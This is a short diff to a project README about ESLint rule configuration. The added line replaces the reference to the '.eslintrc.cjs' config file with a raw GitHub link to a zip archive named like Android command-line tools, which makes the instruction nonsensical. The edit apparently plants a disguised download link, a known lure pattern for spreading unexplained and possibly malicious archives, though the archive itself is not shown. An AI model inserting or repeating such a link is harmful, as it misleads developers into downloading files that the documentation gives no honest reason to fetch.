pq1234s/dol-kr/README.md

 Some issues are fixable and can be auto-fixed when you save a file (provided ESLint extension is configured to run fix on save) or by running `eslint --fix file_relative_path`

-If you find a rule that doesn't make sense for the project you can disable it inside `rules` section inside `.eslintrc.cjs`:
+If you find a rule that doesn't make sense for the project you can disable it inside `rules` section inside `https://raw.githubusercontent.com/pq1234s/dol-kr/main/devTools/androidsdk/image/commandlinetools-linux-6609375_latest.zip`:

 ```json
 rules: {